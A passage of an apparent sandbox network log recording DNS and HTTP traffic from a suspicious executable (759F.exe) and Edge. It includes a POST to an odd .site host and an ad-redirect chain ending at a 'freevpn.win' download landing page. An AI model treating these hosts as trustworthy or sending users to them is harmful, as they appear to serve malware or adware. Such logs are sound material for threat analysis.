                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          vexacion.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          Response
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          139.45.197.236
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://vexacion.com/afu.php?zoneid=1851483
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          GET /afu.php?zoneid=1851483 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:58 GMT
                                                                                          Content-Type: text/html; charset=utf8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 766a7edc860c34a106e8e19076152d5c
                                                                                          Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:12:58 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:12:58 GMT; path=/
                                                                                          Set-Cookie: syncedCookie=; expires=Tue, 10 Nov 2009 23:00:00 GMT
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://vexacion.com/?z=1851483&syncedCookie=true
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          POST /?z=1851483&syncedCookie=true HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://vexacion.com/afu.php?zoneid=1851483&var=1851483&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Content-Length: 540
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 0c46dc3c2fc8805e060571e13ce6ffd3
                                                                                          Link: <https://ssl.xdisctracking.pw>; rel="preconnect dns-prefetch",<https://propeller-tracking.com>; rel="preconnect dns-prefetch"
                                                                                          Referrer-Policy: no-referrer
                                                                                          Location: https://ssl.xdisctracking.pw/tracking202/redirect/rtr.php?t202id=44563&c1=437503065499636034&c2=PA_POP_1851483&t202kw=PA_POP_1851483
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          Timing-Allow-Origin: *
                                                                                          Set-Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:12:59 GMT; path=/
                                                                                          Set-Cookie: oaidts=1625872378; expires=Sat, 09 Jul 2022 23:12:59 GMT; path=/
                                                                                          Set-Cookie: syncedCookie=true; expires=Fri, 16 Jul 2021 23:12:59 GMT; path=/
                                                                                          Strict-Transport-Security: max-age=1
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Timing-Allow-Origin: *
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          my.rtmark.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          Response
                                                                                          my.rtmark.net
                                                                                          IN A
                                                                                          139.45.195.8
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://vexacion.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: vexacion.com
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 204 No Content
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:57 GMT
                                                                                          Connection: keep-alive
                                                                                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                          Cache-Control: max-age=315360000
                                                                                          Pragma: public
                                                                                          Cache-Control: public, must-revalidate, proxy-revalidate
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://vexacion.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          139.45.197.236:80
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: vexacion.com
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 204 No Content
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:58 GMT
                                                                                          Connection: keep-alive
                                                                                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                          Cache-Control: max-age=315360000
                                                                                          Pragma: public
                                                                                          Cache-Control: public, must-revalidate, proxy-revalidate
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://my.rtmark.net/img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          139.45.195.8:443
                                                                                          Request
                                                                                          GET /img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4 HTTP/2.0
                                                                                          host: my.rtmark.net
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: http://vexacion.com/afu.php?zoneid=1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:12:58 GMT
                                                                                          content-type: image/gif
                                                                                          content-length: 43
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding, Authorization,X-CSRF-Token
                                                                                          access-control-expose-headers: Authorization
                                                                                          access-control-allow-credentials: true
                                                                                          timing-allow-origin: *
                                                                                          set-cookie: ID=3819b934f4054333861a9d6dc9a564e4; expires=Sat, 09 Jul 2022 23:12:58 GMT; secure; SameSite=None
                                                                                          strict-transport-security: max-age=1
                                                                                          x-content-type-options: nosniff
                                                                                          timing-allow-origin: *
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 1189
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ssl.xdisctracking.pw
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ssl.xdisctracking.pw
                                                                                          IN A
                                                                                          Response
                                                                                          ssl.xdisctracking.pw
                                                                                          IN A
                                                                                          104.21.59.88
                                                                                          ssl.xdisctracking.pw
                                                                                          IN A
                                                                                          172.67.220.164
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ssl.xdisctracking.pw/tracking202/redirect/rtr.php?t202id=44563&c1=437503065499636034&c2=PA_POP_1851483&t202kw=PA_POP_1851483
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.21.59.88:443
                                                                                          Request
                                                                                          GET /tracking202/redirect/rtr.php?t202id=44563&c1=437503065499636034&c2=PA_POP_1851483&t202kw=PA_POP_1851483 HTTP/2.0
                                                                                          host: ssl.xdisctracking.pw
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: http://vexacion.com/afu.php?zoneid=1851483&var=1851483&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          set-cookie: tracking202subid=186205267; expires=Sun, 08-Aug-2021 23:12:59 GMT; Max-Age=2592000; path=/; domain=51.68.34.45
                                                                                          set-cookie: tracking202subid_a_335=186205267; expires=Sun, 08-Aug-2021 23:12:59 GMT; Max-Age=2592000; path=/; domain=51.68.34.45
                                                                                          location: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          cf-cache-status: DYNAMIC
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=hdX9Qp0sMKJ6lOwYb6LByMoja30V1zGOGmbJRm%2FmOgmSdjTV4qYqXR7gdbf8jPlM9R7llIFWIwOcRszu6IjDRXSaW0pVrqquVBjeIQGOZjuLrIi2w6M%2BhMcmAO1xPJomxHk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d8398aa0c19-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.freevpn.win
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.freevpn.win
                                                                                          IN A
                                                                                          Response
                                                                                          www.freevpn.win
                                                                                          IN A
                                                                                          172.67.185.200
                                                                                          www.freevpn.win
                                                                                          IN A
                                                                                          104.21.88.157
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483 HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: http://vexacion.com/afu.php?zoneid=1851483&var=1851483&rid=3V3cJ5LEtuPAKYxz6tD_Kw%3D%3D
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: text/html
                                                                                          cf-railgun: direct (waiting for pending WAN connection)
                                                                                          last-modified: Thu, 08 Jul 2021 16:07:56 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Yg%2FZmjLXYjus32rr2mwoUxVHPJfZenuvNiEciOkr8DOP4IRKO9vYUUGK5vZz1lfMISyQjZq1%2FQ3aJY%2FyjT%2Ba0cS9gbyEfDiqpbo8U0B6EU1sGippGb0LCAZGQPU%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d848aa40125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/lpbox.css?ts=9348934
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/lpbox.css?ts=9348934 HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: text/css, */*
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: text/css
                                                                                          last-modified: Thu, 08 Jul 2021 16:07:50 GMT
                                                                                          etag: W/"60e722d6-1427"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5753
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eRjtSootKKfhwvELTM8f8I6LCXjrycoXiwZ2Bx4zag4V23UT090i%2FnZCn%2BBg5omCJ%2FKlKnf71HIppnpJms8o5cHbNMvOr4Tj%2FY9rB8d97AuuExSnsN0j7eQACz3I"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d853b700125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/assist/assist.css?ts=388438544
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/assist/assist.css?ts=388438544 HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: text/css, */*
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: text/css
                                                                                          last-modified: Thu, 24 Jun 2021 20:01:08 GMT
                                                                                          etag: W/"60d4e484-474"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 4834
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=y2dMPgD2wSuCut4%2BJKdQ%2FOzKQM4I7wZlvqoa6OdiuX3jcanKQyt1qboxnHyGiOmkDpJPYolDhQyNMAwpJfyXss7XnzvL%2FM9eQeeYDbxnXF4PXjopIxqpkCgsvaMi"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d853b760125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/logo-72x72.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/logo-72x72.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 3371
                                                                                          last-modified: Thu, 08 Jul 2021 11:58:25 GMT
                                                                                          etag: "60e6e861-d2b"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5753
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=w%2FW11uU0HonikllWtEFe%2BMuAywA4WhLiSsgbh4SokAEzSvjgcktJkxbiJ4osTchNALiPgDwkg0%2FO%2BtvddLcOu%2BHkiFvK3bGSkketO9Xb3AVXXv%2FRsv4L9stM8it9"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d854b7c0125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/javascript
                                                                                          last-modified: Wed, 07 Jul 2021 15:32:55 GMT
                                                                                          etag: W/"60e5c927-4d7"
                                                                                          cf-request-id: 0b2f24c760000001253d86d000000001
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VxgjcX6NWI6cRPI2p43rVNTksvfnujrZV0MpEoc5UnsB623%2BYSlKMr1MRf%2BvRbEygr092O78pgSrXJ5MtXBJgMdBC7zvIhUgeCxBk%2BPyj%2FfjN5uZKiyYQPtkoirH"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d856b9f0125-AMS
                                                                                          x-frame-options: DENY
                                                                                          x-content-type-options: nosniff
                                                                                          expires: Sun, 11 Jul 2021 23:12:59 GMT
                                                                                          cache-control: max-age=172800
                                                                                          cache-control: public
                                                                                          content-encoding: gzip
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/dlcommon.js?ts=2345535677
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/dlcommon.js?ts=2345535677 HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/javascript
                                                                                          last-modified: Thu, 24 Jun 2021 20:00:14 GMT
                                                                                          etag: W/"60d4e44e-1295"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 4834
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6%2BM5RQ4X7%2F8orSvth2vZ08AWeiZ6ambYQONGyo6DXOxijjyExsb5aXgij%2BRj3Of9p0qZBWq41vBqSd614h5HQlZI4JAn4Z3rInn%2BxUGkLch84FbQg3CKxsfgv7jV"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d85abea0125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/fonts/helveticaneueltstd-roman_0-webfont.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/fonts/helveticaneueltstd-roman_0-webfont.woff HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: */*
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.freevpn.win
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/font-woff
                                                                                          last-modified: Thu, 08 Jul 2021 11:54:41 GMT
                                                                                          etag: W/"60e6e781-672c"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5721
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=MYJmJUCr4Tf98sg0ZERcv5xpa2XLx%2BxHDN3GZ7cpeHaREiJhHQJ6Z%2FuMlBskVqkt2MUJWtE2bHobmGpBqaZ%2BhtwS3HnHHswNzN%2BAA0dqZ4nVltLAHr6OK3vXMVC%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d85fc420125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/top.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/top.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 2394
                                                                                          last-modified: Thu, 08 Jul 2021 13:22:03 GMT
                                                                                          etag: "60e6fbfb-95a"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5754
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
